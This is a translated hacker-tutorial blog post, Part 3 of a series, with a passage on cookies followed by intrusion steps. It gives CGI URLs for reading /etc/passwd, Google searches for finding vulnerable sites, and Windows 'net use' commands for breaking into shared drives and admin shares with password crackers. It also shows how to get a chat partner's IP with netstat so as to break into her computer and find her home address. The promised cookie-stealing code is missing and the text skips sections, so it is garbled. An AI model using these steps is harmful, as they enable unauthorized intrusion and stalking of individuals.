The most basic insights to becoming a Hacker - Part 3

20. What is cookie

Cookies are small pieces of structured data shared between the web site and the user's browser. Cookies are stored under small data files in text format (size less than 4k). They are created by sites to store / track / identify information about users who have visited the site and the areas they visited in the site.

This information may include user names / identifiers, passwords, preferences, habits . Cookies accepted by the user's browser on the hard disk of his or her computer, not all browsers support cookies. . After a visit to the site, information about the user is stored in the cookie. On subsequent visits to the site, the web site may re-use the information in the cookie (such as information related to logging into a forum .) without the user having to redo the login operation or not. Re-enter other information. The problem is that there are many sites that manage to reuse the information stored in the cookie incorrectly, inadequately check or encode the information in the cookie while opening the door to help the hacker exploit to pass the door. import, take control of the site.

Cookies often have the following ingredients:

+ Name: chosen by the web site programmer
+ Domain: is the domain name from the server that the cookie is created and sent
+ Path: information about the path at the web site you are viewing
+ Expiration date: is the time when the cookie expires.
+ Security: If this value is set inside the cookie, the information will be encrypted during transmission between the server and browser.
+ Other values: are the specific data stored by the web server to identify later these values ​​do not contain spaces, dots, commas and are limited to about 4k.

(Viethacker.net documentation)

21. The victim's cookie stealing technique

First of all, please open notepad and copy the following code into that notepad:

 CODE /*  CODE /* 

+ file containing passwd is usually stored in the / etc directory, please type in the following URL:

http://www.servername.com/cgi-bin/ nph-test-cgi?/etc/*

Second error: error php.cgi

+ Similarly, you only need to type on the following line URL to get the pass:

http://www.servername.com/cgi-bin/ php.cgi?/etc/passwd

It is important that these are old bugs, so finding websites for you to practice is very difficult, go to google.com and type in the keywords:

 /cgi-bin/php.cgi?/etc/passwd] 
 hoặc cgi-bin/nph-test-cgi?/etc 

Then you look on it to see which page has not fixed the error to practice offline.

25. Computer penetration techniques are online

Entering online computers is a technique that is both easy and difficult. You can say it easily when you use the ENT 3 tool, but you will have problems using it as the speed of using the victim's computer will be significantly slowed and the devices they don't share cannot be invaded. can be imported, so if they turn off the phone, I will get a job when I have not had a chance to steal account, have a quieter way, less to reduce the speed and can penetrate when the victim does not share is to use the DOS program to attack. Ok, we'll start:

Use IP scan program like ENT 3 to scan target IP.

Go to Start ==> Run type cmd command.

In the DOS window, type 'net view' command

CODE

+ Eg: c: net view 203.162.30.xx

Please see the results, if it has a share, it is easy, you just need to continue the command

net use :

+ Eg: c: net use E: 203.162.30.xxC

If, when connecting the victim machine, which requires using Passwd, download the passwd program to use (in my opinion, download the program 'pqwak2' that applies to the passwd detection on the computer using Win98 or Winme OS). and 'xIntruder' program for NT). Note that on how to use, the two programs are similar, first line we hit the victim's IP, the second line we type the victim's share drive but for 'xIntruder' we note its Delay correction for reasonably, in the LAN then its delay is 100 and in the Internet is above 5000.

If the victim's device does not have a share, then type the command:

 net use : c $ (or d $) "administrator" 

+ Eg: net use E: 203.162.30.xxC $ "administrator"

The share type with c $ is the default for all USER machines as "administrator".

We can apply this method to break into your friend's computer, but I 'secretly remember' to find the data related to her address (provided that she is using the device at home and You are lucky to find that address). You just need to chat Y! Mass then go to DOS command:

c:netstat –n

When you use this method, turn off all other windows just to frame your Y! Mass chat with her, it will make it easier for you to determine her IP address. Then you use the infiltration method that I mentioned above. (Perhaps our former company guy, when he flirted with a distant friend on the Internet, used this method to break into and find out her address here.)

You will succeed if the victim's computer does not install a firewall or proxy.

================================================== = =
Many of you have asked me to give the correct address for you to practice, but I can not give it because I learned the lessons with the correct address, when you finish the practice, you will have admin rights. You have deleted their database. Thus, HVA will be known as the place where online vandalism begins. Please sympathize, if possible, I will only provide ways for you to find those faulty addresses and not give any specific addresses.
================================================== = =

In Part 4, I will mention the anti-intrusion technique on my computer when I go online, find out the steps when we decide to hack a Web site, find out the error of the website to practice, hacking techniques Web via error Gallery .

GOOKLUCK !!!!!!!!!

1. The most basic insights to becoming a Hacker - Part 2
2. The most basic insights to becoming a Hacker - Part 1